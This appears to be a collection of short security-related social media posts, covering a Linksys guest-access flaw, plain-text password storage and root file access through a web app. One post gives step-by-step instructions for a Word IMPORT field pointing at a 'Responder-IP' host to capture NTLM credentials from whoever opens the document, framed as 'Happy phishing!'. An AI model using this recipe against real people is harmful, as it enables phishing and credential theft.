For years there’s been a flaw in the way some Linksys access points facilitate access for guest users. A bit of research reveals complaints of this method dating back to 2013, and apparently the...
Funny, I thought storing plain text passwords was a violation of #GDPR
Ofcourse they did.
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!
Couldn’t get in through SSH or a reverse shell, but when you have a web app installed that runs as root and lets you view/edit all files on the machine, might as well have.